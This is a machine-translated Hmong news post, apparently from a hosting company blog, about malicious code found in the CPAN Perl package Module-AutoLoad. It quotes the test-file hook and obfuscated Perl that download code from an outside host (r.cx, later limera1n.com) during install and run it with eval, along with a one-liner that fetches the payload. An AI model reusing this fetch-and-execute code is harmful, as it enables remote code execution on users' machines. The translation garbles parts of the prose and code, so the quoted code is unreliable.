ProHoster > Π‘Π»ΠΎΠ³ > xov xwm hauv internet > Malicious code kuaj pom hauv Module-AutoLoad Perl pob

Malicious code kuaj pom hauv Module-AutoLoad Perl pob

Nyob rau hauv ib pob Perl faib los ntawm CPAN directory Module-AutoLoad, tsim los cia li thauj CPAN modules ntawm ya, txheeb xyuas siab phem code. Lub siab phem ntxig yog pom nyob rau hauv lub xeem code 05 rx.t, uas tau xa khoom txij li xyoo 2011.
Nws yog noteworthy tias cov lus nug txog loading questionable code tshwm sim Stackoverflow rov qab rau xyoo 2016.

Kev ua phem ua rau npau taws mus rau qhov kev sim rub tawm thiab ua tiav cov lej los ntawm tus neeg thib peb tus neeg rau zaub mov (http://r.cx:1/) thaum lub sijhawm ua tiav ntawm chav ntsuas pib thaum txhim kho lub module. Nws yog assumed tias tus lej pib rub tawm los ntawm lwm tus neeg rau zaub mov tsis yog phem, tab sis tam sim no qhov kev thov raug xa rov qab mus rau ww.limera1n.com sau, uas muab nws feem ntawm tus lej rau kev ua tiav.

Txhawm rau npaj qhov rub tawm hauv cov ntaub ntawv 05 rx.t Cov cai hauv qab no yog siv:

kuv $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
kuv $try = `$^X $prog`;

Cov cai teev tseg ua rau cov ntawv ua tiav ../contrib/RCX.pl, cov ntsiab lus ntawm uas yog txo mus rau kab:

use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88":1β€³};

Tsab ntawv no loads tsis meej pem siv qhov kev pabcuam perlobfuscator.com code los ntawm tus tswv tsev sab nraud r.cx (cov cim cim 82.46.99.88 sib haum rau cov ntawv "R.cX") thiab ua tiav nws hauv eval block.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88":1β€³; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Tom qab unpacking, cov hauv qab no yog thaum kawg ua: code:

print{$b=new IO::Socket::INET"ww.limera1n.com:80β€³}"GET /iJailBreak
";evalor rov ceeb toom $@while$b;1

Cov pob teeb meem tam sim no tau raug tshem tawm ntawm lub chaw cia khoom. mas (Perl Authors Upload Server), thiab tus qauv sau tus account raug thaiv. Nyob rau hauv cov ntaub ntawv no, lub module tseem nyob muaj hauv MetaCPAN archive thiab tuaj yeem ntsia ncaj qha los ntawm MetaCPAN siv qee cov khoom siv xws li cpanminus. Nws yog sau tsegtias pob ntawv tsis tau dav dav.

Txaus siab los tham txuas thiab tus sau ntawm lub module, uas tsis kam lees cov ntaub ntawv uas tsis zoo code raug tso tom qab nws qhov chaw "r.cx" raug hacked thiab piav qhia tias nws tsuas yog muaj kev lom zem, thiab siv perlobfuscator.com tsis txhob zais ib yam dab tsi, tab sis kom txo qhov loj me. ntawm cov cai thiab simplifying nws luam ntawm cov ntawv teev cia. Kev xaiv ntawm lub npe ua haujlwm "botstrap" tau piav qhia los ntawm qhov tseeb tias lo lus no "suab zoo li bot thiab luv dua bootstrap." Tus sau ntawm lub module kuj tau lees paub tias qhov kev txheeb xyuas qhov kev ua haujlwm tsis ua qhov phem, tab sis tsuas yog qhia txog kev thauj khoom thiab ua tiav cov cai ntawm TCP.

Tau qhov twg los: opennet.ru

Ntxiv ib saib